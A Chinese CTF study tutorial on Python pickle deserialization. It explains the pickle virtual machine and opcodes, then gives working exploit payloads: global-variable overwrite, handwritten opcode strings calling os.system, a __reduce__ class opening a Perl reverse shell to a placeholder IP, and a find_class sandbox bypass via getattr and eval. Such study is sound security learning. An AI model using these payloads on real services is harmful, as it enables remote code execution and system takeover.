python反序列化漏洞
前言
关于python反序列化漏洞,网上也是有很多资料了,就这近期遇见的CTF中的python反序列化,对其进行学习一下。
我们之前学习过php的反序列化漏洞,我们可以照着php反序列化的思路来学习python反序列化。
本篇主要记录pickle反序列化的学习
介绍
Python 的序列化指的是将 Python 对象转换为一种格式,以便可以将其存储在文件或通过网络传输。Python 中最常用的序列化模块是 pickle
模块。
Python 的反序列化是将序列化后的数据重新转换为 Python 对象。在上面的示例中,我们使用 pickle 模块的 load()
函数反序列化存储在文件中的 Python 对象。
第一个pickle反序列化
import pickle
class test:
def __init__(self):
self.people = 'lituer'
a = test()
serialized = pickle.dumps(a, protocol=3) # 指定PVM 协议版本
print(serialized)
unserialized = pickle.loads(serialized) # 注意,loads 能够自动识别反序列化的版本
print(unserialized.people)
'\x80\x03c__main__\ntest\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00peopleq\x03X\x06\x00\x00\x00lituerq\x04sb.'
1
Python 官方提供了工具,叫 pickletools
它的作用主要是:
- 可读性较强的方式展示一个序列化对象(
pickletools.dis
) - 对一个序列化结果进行优化(
pickletools.optimize
)
import pickletools
。。。
print(pickletools.dis(serialized))
0: \x80 PROTO 3
2: c GLOBAL '__main__ test'
17: q BINPUT 0
19: ) EMPTY_TUPLE
20: \x81 NEWOBJ
21: q BINPUT 1
23: } EMPTY_DICT
24: q BINPUT 2
26: X BINUNICODE 'people'
37: q BINPUT 3
39: X BINUNICODE 'lituer'
50: q BINPUT 4
52: s SETITEM
53: b BUILD
54: . STOP
highest protocol among opcodes = 2
可读性较强
想要弄懂这个回显的具体内容,我们还要弄得一个东西,PVM
PVM
我们在使用pickler的时候,我们要序列化的内容,必须经过PVM,Pickle Virtual Machine (PVM)是Python语言中的一个虚拟机,用于序列化和反序列化Python对象。它是Python标准库中的一部分,由Python的pickle模块提供支持。下面是Pickle Virtual Machine的运行原理:
- 生成操作码序列:pickle模块在序列化Python对象时,会生成一系列操作码(opcode)来表示对象的类型和值。这些操作码将被保存到文件或网络流中,以便在反序列化时使用。
- 反序列化操作码:在反序列化时,pickle模块读取操作码序列,并将其解释为Python对象。它通过Pickle Virtual Machine来执行操作码序列。Virtual Machine会按顺序读取操作码,并根据操作码的类型执行相应的操作。
- 执行操作码:Pickle Virtual Machine支持多种操作码,包括压入常量、调用函数、设置属性等。执行操作码的过程中,Virtual Machine会维护一个栈来存储数据。当执行操作码时,它会将数据从栈中取出,并根据操作码的类型进行相应的操作。执行完成后,结果将被压入栈中。
- 构造Python对象:当操作码序列被完全执行后,Pickle Virtual Machine会将栈顶的数据作为结果返回。这个结果就是反序列化后的Python对象。
PVM 由三部分组成
指令处理器、栈区和内存区。
- 指令处理器:从流中读取 opcode 和参数,并对其进行解释处理。重复这个动作,直到遇到
.
这个结束符后停止(。最终留在栈顶的值将被作为反序列化对象返回。需要注意的是: - opcode 是单字节的
- 带参数的指令用换行符来确定边界
- 栈区:用 list 实现的,被用来临时存储数据、参数以及对象。
- 内存区:用 dict 实现的,为 PVM 的整个生命周期提供存储。
PVM工作流程
这里我们放一个动图便于理解,下面我们也会从代码的角度来分析指令处理器读取序列化字节流的全过程
- PVM解析
str
的过程
- PVM解析
__reduce__()
的过程
PVM 协议
当前共有 6 种不同的协议可用,使用的协议版本越高,读取所生成 pickle 对象所需的 Python 版本就要越新。
- v0 版协议是原始的“人类可读”协议,并且向后兼容早期版本的 Python
- v1 版协议是较早的二进制格式,它也与早期版本的 Python 兼容
- v2 版协议是在 Python 2.3 中加入的,它为存储 new-style class 提供了更高效的机制(参考 PEP 307)。
- v3 版协议是在 Python 3.0 中加入的,它显式地支持 bytes 字节对象,不能使用 Python 2.x 解封。这是 Python 3.0-3.7 的默认协议。
- v4 版协议添加于 Python 3.4。它支持存储非常大的对象,能存储更多种类的对象,还包括一些针对数据格式的优化(参考 PEP 3154)。它是 Python 3.8 使用的默认协议。
- v5 版协议是在 Python 3.8 中加入的。它增加了对带外数据的支持,并可加速带内数据处理(参考 PEP 574
上面的我们以V3为例
opcode
也就是操作码,opcode是序列化内容的核心,下面是所以的opcode的操作码
全部opcode
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
# Protocol 5
BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly
常用opcode
指令 | 描述 | 具体写法 | 栈上的变化 |
---|---|---|---|
c | 获取一个全局对象或import一个模块 | c[module]\n[instance]\n | 获得的对象入栈 |
o | 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) | o | 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈 |
i | 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) | i[module]\n[callable]\n | 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈 |
N | 实例化一个None | N | 获得的对象入栈 |
S | 实例化一个字符串对象 | S'xxx'\n(也可以使用双引号、\'等python字符串形式) | 获得的对象入栈 |
V | 实例化一个UNICODE字符串对象 | Vxxx\n | 获得的对象入栈 |
I | 实例化一个int对象 | Ixxx\n | 获得的对象入栈 |
F | 实例化一个float对象 | Fx.x\n | 获得的对象入栈 |
R | 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 | R | 函数和参数出栈,函数的返回值入栈 |
. | 程序结束,栈顶的一个元素作为pickle.loads()的返回值 | . | 无 |
( | 向栈中压入一个MARK标记 | ( | MARK标记入栈 |
t | 寻找栈中的上一个MARK,并组合之间的数据为元组 | t | MARK标记以及被组合的数据出栈,获得的对象入栈 |
) | 向栈中直接压入一个空元组 | ) | 空元组入栈 |
l | 寻找栈中的上一个MARK,并组合之间的数据为列表 | l | MARK标记以及被组合的数据出栈,获得的对象入栈 |
] | 向栈中直接压入一个空列表 | ] | 空列表入栈 |
d | 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) | d | MARK标记以及被组合的数据出栈,获得的对象入栈 |
} | 向栈中直接压入一个空字典 | } | 空字典入栈 |
p | 将栈顶对象储存至memo_n | pn\n | 无 |
g | 将memo_n的对象压栈 | gn\n | 对象被压栈 |
0 | 丢弃栈顶对象 | 0 | 栈顶对象被丢弃 |
b | 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 | b | 栈上第一个元素出栈 |
s | 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 | s | 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新 |
u | 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 | u | MARK标记以及被组合的数据出栈,字典被更新 |
a | 将栈的第一个元素append到第二个元素(列表)中 | a | 栈顶元素出栈,第二个元素(列表)被更新 |
e | 寻找栈中的上一个MARK,组合之间的数据并extends到该MARK之前的一个元素(必须为列表)中 | e | MARK标记以及被组合的数据出栈,列表被更新 |
至此,我们已经理解完了PVM的基本内容,这时我们不妨大胆猜测一下整个反序列化的过程:
首先把字节流从栈中拿出,然后指令处理器读取opcode命令,按照opcode 的操作进行一系列操作。
前面知道了,后面知道了,就中间的处理序列化字节流的过程我们还是一头雾水,不慌,下面我们来通过审计源码的方式,来读懂opcode编码,就拿上面的反序列化操作中的序列化字节流为例
b'\x80\x03c__main__\ntest\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00peopleq\x03X\x06\x00\x00\x00lituerq\x04sb.'
深入python源码分析序列化字节流
\x80
源码
def load_proto(self):
proto = self.read(1)[0]
if not 0 <= proto <= HIGHEST_PROTOCOL:
raise ValueError("unsupported pickle protocol: %d" % proto)
self.proto = proto
dispatch[PROTO[0]] = load_proto
代码首先从输入流中读取一个字节并将其存储在 proto
变量中。然后,它检查该变量的值是否在合法的 pickle 协议范围内,如果不是,则引发一个 ValueError
异常,指示不支持的协议。最后,它将 proto
变量的值存储在对象的 proto
属性中。
它对我们理解整个内容几乎没有影响。
\x03
版本,不用多说了
c
获取一个全局对象或import一个模块(注:会调用import语句,能够引入新的包)会加入self.stack
源代码:
def load_global(self):
#往后读到换行符作为模块名 __main__
module = self.readline()[:-1].decode("utf-8")
#往后读到换行符作为类名 animal
name = self.readline()[:-1].decode("utf-8")
#进入find_class
klass = self.find_class(module, name)
self.append(klass)#获取模块后添加到当前栈中
dispatch[GLOBAL[0]] = load_global
find_class()函数
def find_class(self, module, name):
# 在系统审核日志中记录“pickle.find_class”事件,包括模块名和对象名
sys.audit('pickle.find_class', module, name)
# 如果协议版本小于3且开启了fix_imports标志,则进行特殊的名称和模块映射处理
if self.proto < 3 and self.fix_imports:
# 如果(module, name)在NAME_MAPPING中,则使用映射的名称代替原名称
if (module, name) in _compat_pickle.NAME_MAPPING:
module, name = _compat_pickle.NAME_MAPPING[(module, name)]
# 如果module在IMPORT_MAPPING中,则使用映射的模块名代替原模块名
elif module in _compat_pickle.IMPORT_MAPPING:
module = _compat_pickle.IMPORT_MAPPING[module]
# 动态加载指定模块
__import__(module, level=0)
# 如果协议版本大于等于4,则使用_getattribute方法获取对象
if self.proto >= 4:
return _getattribute(sys.modules[module], name)[0]
# 否则,使用getattr方法获取对象
else:
return getattr(sys.modules[module], name)
然后self.append(klass)
添加到当前栈中,所以当前栈中有:
self=> stack:[类]
q
对应源码
def load_binput(self):
# 从输入流中读取一个字节作为索引,表示待保存对象在memo字典中的位置
i = self.read(1)[0]
# 如果读取到的索引小于0,则引发ValueError异常
if i < 0:
raise ValueError("negative BINPUT argument")
# 将当前堆栈顶部的对象保存到memo字典中,使用读取到的索引作为键值
self.memo[i] = self.stack[-1]
# 将memo字典添加到堆栈中
self.append(self.memo)
# 将load_binput函数注册到pickle库的分发表中,以便在序列化时调用
dispatch[BINPUT[0]] = load_binput
所以记忆栈中存在了test类
memo=> stack:[类]
)
def load_empty_tuple(self):
self.append(())#向当前栈中增加一个新的元组
dispatch[EMPTY_TUPLE[0]] = load_empty_tuple
操作完之后栈区就变成了
self=> stack:[类,()]
\x81
弹出self栈中的两个元素 然后把参数传入__new__
对类进行实例化
def load_newobj(self):
args = self.stack.pop() # 空元组()
cls = self.stack.pop() #
obj = cls.__new__(cls, *args)
#__new__方法的作用是修改不可变类(int,String)等基本类都是不可变类,此处不需修改,所以传入元组
self.append(obj) #将实例化的test给self这个self栈中
dispatch[NEWOBJ[0]] = load_newobj
这时的self栈区
self=> stack:[(对象)]
q
把self中的对象压入memo栈中
def load_binput(self):
i = self.read(1)[0]#继续读取下一个字节,赋值给i
if i < 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]#将栈中的栈尾(与栈顶相对)存入记忆栈中memo
dispatch[BINPUT[0]] = load_binput
当前的memo栈有
memo=> stack:[(类) , (对象)]
}
向栈区压入一个空字典
def load_empty_dictionary(self):
self.append({})
dispatch[EMPTY_DICT[0]] = load_empty_dictionary
当前self栈
self=> stack:[(对象),{}]
q
def load_binput(self):
i = self.read(1)[0]
if i < 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]#将栈中的栈尾栈顶存入记忆栈中memo
dispatch[BINPUT[0]] = load_binput
当前memo栈
memo=> stack:[(类) , (对象),{}]
X
源码
def load_binunicode(self):
len, = unpack('<i>6
if len > maxsize: #这里的6也就是后面的x06也就是属性名字符串的长度
raise UnpicklingError("BINUNICODE exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
#再往后读len长度的字节数 people(属性名) 然后存入到栈中中
dispatch[BINUNICODE[0]] = load_binunicode
所以self栈中就是
self=> stack:[(对象),{},"people"]
q
和上面的思路一样,不多赘述了
此时的memo栈中的内容如下
memo=> stack:[(类) , (对象),{},"people"]
X
读取后面的\x03识别长度为三的字符串
def load_binunicode(self):
len, = unpack('<i> 3
if len > maxsize: #读取后面的\x03识别长度为三的字符串
raise UnpicklingError("BINUNICODE exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass')) dog
#再往后读len长度的字节数 lituer(属性值) 然后存入到栈中中
dispatch[BINUNICODE[0]] = load_binunicode
此时self栈中的内容
self=> stack:[(对象),{},"people","lituer"]
q
def load_binput(self):
i = self.read(1)[0]#继续读取下一个字节 \x04 ,赋值给i
if i < 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]
dispatch[BINPUT[0]] = load_binput
当前memo的栈中的内容
memo=> stack:[(类) , (对象),{},"people","lituer"]
s
将栈的第一个对象作为 value,第二个对象作为 key,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为 key)中
对应源码
def load_setitem(self):
stack = self.stack
value = stack.pop() #"people"
key = stack.pop() #"lituer"
#弹出这两个对象
dict = stack[-1] #栈顶{}
#
dict[key] = value #{"people":"lituer"}
dispatch[SETITEM[0]] = load_setitem
self=> stack:[(对象),{"people":"lituer"}]
b
使用栈中的第一个元素(储存多个 属性名-属性值 的字典)对第二个元素(对象实例)进行属性设置,调用 setstate 或 dict.update()
源码
def load_build(self):
stack = self.stack
state = stack.pop() #{"people":"lituer"}
inst = stack[-1] #(对象)
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
#检查是否存在 __setstate__ 方法 一般是不存在的
###############################################
setstate(state) ###########会造成任意函数调用
############################################
return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
self=> stack:[(拥有数据的对象)
所以最后栈顶的内容就是反序列化后的内容
.
结束反序列化
def load_stop(self):
value = self.stack.pop()
raise _Stop(value)
dispatch[STOP[0]] = load_stop
至此整个反序列化过程结束,相信到此为止PVM的工作原理有了一个明确的了解
pickletools
不过我们有的时候没有必要全部解读opcode,找着表一个一个查未免有些太麻烦了,pickle规定了pickletools便于人工解读opcode
import pickletools
opcode = b'''c__main__
secret
(S'secret'
S'Hack!!!'
db.'''
pickletools.dis(opcode)
下面是pickletools的三个方法
1,pickletools.dis(pickle, out=None, memo=None, indentlevel=4, annotate=0)
将 pickle 的符号化反汇编数据输出到文件类对象 out,默认为 sys.stdout。 pickle 可以是一个字符串或一个文件类对象。 memo 可以是一个将被用作 pickle 的备忘记录的 Python 字典;它可被用来对由同一封存器创建的多个封存对象执行反汇编。 由 MARK 操作码指明的每个连续级别将会缩进 indentlevel 个空格。 如果为 annotate 指定了一个非零值,则输出中的每个操作码将以一个简短描述来标注。 annotate 的值会被用作标注所应开始的列的提示。
2,pickletools.genops(pickle)
提供包含 pickle 中所有操作码的 iterator,返回一个 (opcode, arg, pos) 三元组的序列。 opcode 是 OpcodeInfo 类的一个实例;arg 是 Python 对象形式的 opcode 参数的已解码值;pos 是 opcode 所在的位置。 pickle 可以是一个字符串或一个文件类对象。
3,pickletools.optimize(picklestring)
在消除未使用的 `PUT` 操作码之后返回一个新的等效 pickle 字符串。 优化后的 pickle 将更为简短,耗费更为的传输时间,要求更少的存储空间并能更高效地解封。
一些魔术方法
链接官方文档:pickle --- Python 对象序列化 — Python 3.11.2 文档
具体内容可以阅读官方文档,这里着重说一下__reduce__()
opcode R
其实就是 __reduce__()
__reduce__()
方法不带任何参数,并且应返回字符串或最好返回一个元组(返回的对象通常称为 “reduce 值”)。
如果返回字符串,该字符串会被当做一个全局变量的名称。它应该是对象相对于其模块的本地名称,pickle 模块会搜索模块命名空间来确定对象所属的模块。这种行为常在单例模式使用。
如果返回的是元组,则应当包含 2 到 6 个元素,可选元素可以省略或设置为 None。每个元素代表的意义如下:
- 一个可调用对象,该对象会在创建对象的最初版本时调用。
- 可调用对象的参数,是一个元组。如果可调用对象不接受参数,必须提供一个空元组。
- 可选元素,用于表示对象的状态,将被传给前述的
__setstate__()
方法。如果对象没有此方法,则这个元素必须是字典类型,并会被添加至__dict__
属性中。 - 可选元素,一个返回连续项的迭代器(而不是序列)。这些项会被
obj.append(item)
逐个加入对象,或被obj.extend(list_of_items)
批量加入对象。这个元素主要用于 list 的子类,也可以用于那些正确实现了append()
和extend()
方法的类。(具体是使用append()
还是extend()
取决于 pickle 协议版本以及待插入元素的项数,所以这两个方法必须同时被类支持) - 可选元素,一个返回连续键值对的迭代器(而不是序列)。这些键值对将会以
obj[key] = value
的方式存储于对象中。该元素主要用于 dict 子类,也可以用于那些实现了__setitem__()
的类。 - 可选元素,一个带有
(obj, state)
签名的可调用对象。该可调用对象允许用户以编程方式控制特定对象的状态更新行为,而不是使用 obj 的静态__setstate__()
方法。如果此处不是 None,则此可调用对象的优先级高于 obj 的__setstate__()
。
3.8 新版功能: 新增了元组的第 6 项,可选元素 (obj, state)
可以看出,其实 pickle 并不直接调用上面的几个函数。事实上,它们实现了 __reduce__()
这一特殊方法。尽管这个方法功能很强,但是直接在类中实现 __reduce__()
容易产生错误。因此,设计类时应当尽可能的使用高级接口(比如 __getnewargs_ex__()
、__getstate__()
和 __setstate__()
)。后面仍然可以看到直接实现 __reduce__()
接口的状况,可能别无他法,可能为了获得更好的性能,或者两者皆有之。
pickle反序列化漏洞利用思路
全局变量覆盖
简单思路:
'''
#secret.py
secret="ikun"
'''
import pickle
import secret
print("secret变量的值为:"+secret.secret)
opcode=b'''c__main__
secret
(S'secret'
S'microblacker'
db.'''
hack=pickle.loads(opcode)
print("secret变量的值为:"+secret.secret)
>>>
secret变量的值为:ikun
secret变量的值为:microblacker
稍加解释:我们通过表格拉进行表示一下,(表格表示栈区)
然后最后的b
使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置,也就是把原本的{secret:ikun}代替成{secret:microblacker}
但是这仅仅是这个简单的思路
那我们来实战操作一下,再看下面的例子
import secret
import pickle
class Test:
def __init__(self):
obj = pickle.loads(payload) # 输入点
if obj.pwd == secret.pwd:
print("YES!")
else:
print('None')
a= Test()
当然直接
obj = pickle.loads(b'''c__main__
secret
(S'secret'
S'microblacker'
db.''') # 输入点
就可以实现覆盖,但是我这里还需要说另外的一个方法
全局变量引用
这种方法,就像php反序列化类似。
import secret
import pickle
import pickletools
class secret:
pwd = "microblacker"
class Test:
def __init__(self):
self.pwd = secret.pwd
test = Test()
#用pickletools.optimize优化
serialized = pickletools.optimize(pickle.dumps(test, protocol=0))
print(serialized)
>>>
b'ccopy_reg\n_reconstructor\n(c__main__\nTest\nc__builtin__\nobject\nNtR(dVpwd\nVmicroblacker\nsb.'
此刻,这里虽然self.pwd赋值,但是这里仅仅是引用了局部的secret.pwd,也就是窝里横,我们这里的secret.pwd,并不是来自secret.py,我们并不能完成覆盖,所以要手动改写
把V
换成c
这样就可以引用secret.py中的pwd变量,然后obj等于真正的secret.pwd,实现全局变量引用
b'ccopy_reg\n_reconstructor\n(c__main__\nTest\nc__builtin__\nobject\nNtR(dVpwd\ncsecret\npwd\nsb.'
命令执行
上文中我们也着重说了,我们可以通过在类中重写__reduce__
方法,从而在反序列化时执行任意命令,但是通过这种方法一次只能执行一个命令,如果想一次执行多个命令,就只能通过手写opcode的方式了。
当然这只是主要的,我们还是需要在pickle中用来构造函数执行的字节码有四个个:R
、i
、o
以及b
共同实现命令执行。(b +__setstate__()
)
R
R | 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 | R | 函数和参数出栈,函数的返回值入栈 |
---|---|---|---|
源码:
def load_reduce(self):
stack = self.stack
args = stack.pop() #弹栈作为一个参数,参数必须是元组
func = stack[-1]# 栈中的最后一个元素作为函数的参数
stack[-1] = func(*args)#将原来的栈区中的函数元素覆盖成函数执行结果
dispatch[REDUCE[0]] = load_reduce
简单例子
opcode=b'''cos
system
(S'whoami'
tR.'''
i
i | 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) | i[module]\n[callable]\n | 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈 |
---|---|---|---|
源码:
def load_inst(self):
module = self.readline()[:-1].decode("ascii")#获得module
name = self.readline()[:-1].decode("ascii")#获得参数,name
klass = self.find_class(module, name)#放到find_class寻找调用
self._instantiate(klass, self.pop_mark())#pop_mark 获取参数
dispatch[INST[0]] = load_inst
pop_mark():
def pop_mark(self):
items = self.stack
self.stack = self.metastack.pop()
self.append = self.stack.append
return items#先将当前栈赋值给items 然后弹出栈内元素 随后 将这个栈赋值给当前栈 返回items
简单例子
opcode=b'''(S'whoami'
ios
system
.'''
o
o | 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) | o | 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈 |
---|---|---|---|
源码:
def load_obj(self):
# Stack is ... markobject classobject arg1 arg2 ...
args = self.pop_mark() #当前栈中所有的数据赋值给args
cls = args.pop(0) #弹出第一个,作为类名 利用是为函数名
self._instantiate(cls, args)
dispatch[OBJ[0]] = load_obj
简单例子
opcode=b'''(cos
system
S'whoami'
o.'''
b +__setstate__()
b | 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 | b | 栈上第一个元素出栈 |
---|---|---|---|
源码:
def load_build(self):
stack = self.stack
state = stack.pop()
# 获取栈的倒数第二个元素赋值给inst
inst = stack[-1]
# 获取inst对象的__setstate__属性
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
setstate(state)
return
slotstate = None
# 如果state是元组类型并且长度为2,将其分解为state和slotstate
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
##如果"__setstate__"为空,则state与对象默认的__dict__合并,这一步其实就是将序列化前保存的持久化属性和对象属性字典合并
if state:
inst_dict = inst.__dict__
intern = sys.intern
# 遍历state字典,将键名intern后赋值给inst_dict,键值直接赋值
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
# 如果slotstate不为空,遍历slotstate字典,并将其键值对赋值给inst对象
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
__setstate__()
:
__setstate__
: 官方文档中,如果想要存储对象的状态,就可以使用__getstat__
和__setstat__
方法。由于 pickle 同样可以存储对象属性的状态,所以这两个魔术方法主要是针对那些不可被序列化的状态,如一个被打开的文件句柄open(file,'r')
。
和他成对的还有 __getstate__
,被反序列化时调用__setstate__
,被序列化时调用__getstate__
。重写时可以省略__setstate__
,但__getstate__
必须返回一个字典。如果__getstate__
与__setstate__
都被省略, 那么就默认自动保存和加载对象的属性字典__dict__
。
b'ccopy_reg\n_reconstructor\n(c__main__\nTest\nc__builtin__\nobject\nNtR(d(V__setstate__\ncos\nsystem\nubVwhoami\nb.'
ps:
这里也提供了一个思路,就是我们可以改变opcode的的版本来绕过一些对字母的过滤
abc= b'ccopy_reg\n_reconstructor\n(c__main__\nTest\nc__builtin__\nobject\nNtR(d(V__setstate__\ncos\nsystem\nubVwhoami\nb.'
print(pickle.dumps(pickle.loads(abc),protocol=3))
>>>
#b'\x80\x03c__main__\nTest\nq\x00)\x81q\x01}q\x02X\x0c\x00\x00\x00__setstate__q\x03cnt\nsystem\nq\x04sb.'
这样的opcode中没人‘R’这个字符,所以就绕过了
弹shell
既然可以命令执行,那理所当然的就可以反弹shell,不仅方便,同时也为攻击绕过提供了新思路
演示代码
import pickle
import os
class Person(object):
def __reduce__(self):
return (os.system,("""perl -e 'use Socket;$i="xx.xxx.xxx.xxx";$p=xxxx;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""",))
admin=Person()
a=pickle.dumps(admin)
pickle.loads(a)
漏洞绕过
绕过Unpickler.find_class()
pickle存在如此高危漏洞,不过pickle也给出了防御的方法就是通过重写Unpickler.find_class()
来限制全局变量,我们来看官方的例子
import builtins
import io
import pickle
# 需要限制反序列化对象时可以使用的类
safe_builtins = {
'range', # range类型
'complex', # 复数类型
'set', # 集合类型
'frozenset', # 冻结集合类型
'slice', # 切片类型
}
# 定义RestrictedUnpickler类继承自pickle.Unpickler
class RestrictedUnpickler(pickle.Unpickler):
# 重写find_class方法
def find_class(self, module, name):
# 如果被反序列化的对象的类属于builtins模块中的安全类,则返回该类
if module == "builtins" and name in safe_builtins:
return getattr(builtins, name)
# 如果不是安全类,就抛出异常,禁止反序列化
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))
# 定义一个帮助函数restricted_loads来反序列化对象
def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
# 将传入的字符串s转换为bytes,并使用RestrictedUnpickler类反序列化
return RestrictedUnpickler(io.BytesIO(s)).load()
想要绕过find_class
,我们则需要了解其何时被调用.
出于这样的理由,你可能会希望通过定制 Unpickler.find_class() 来控制要解封的对象。 与其名称所提示的不同, Unpickler.find_class() 会在执行对任何全局对象(例如一个类或一个函数)的请求时被调用 。 因此可以完全禁止全局对象或是将它们限制在一个安全的子集中。
在opcode中,c
、i
、\x93
这三个字节码与全局对象有关,当出现这三个字节码时会调用find_class
,当我们使用这三个字节码时不违反其限制即可。并且find_class() 只会在解析opcode的时候调用一次 所以 只要绕过opcode执行的过程 find_class() 就不会再调用 只需要过一次 通过之后再产生的函数即使在黑名单中 也不会被拦截。
这下思路有了,我们可以只用c
对builtin进行操作来构造payload
opcode=b'''cbuiltins
getattr
p0 #取到内置函数 getattr(),用于获取对象的属性。
(cbuiltins
dict
S'get'
tRp1 #取到builtins.dict
cbuiltins
globals
)Rp2 # getattr(dict, 'get')
00g1
(g2
S'__builtins__' # get(__import__('builtins').globals(), '__builtins__')
tRp3
0g0 #getattr(__builtins__, 'eval')
(g3
S'eval'
tR(S'__import__("os").system("calc")' # 取到 eval 然后实现 RCE
tR.
'''
pickletools:
0: c GLOBAL 'builtins getattr'
18: p PUT 0
21: ( MARK
22: c GLOBAL 'builtins dict'
37: S STRING 'get'
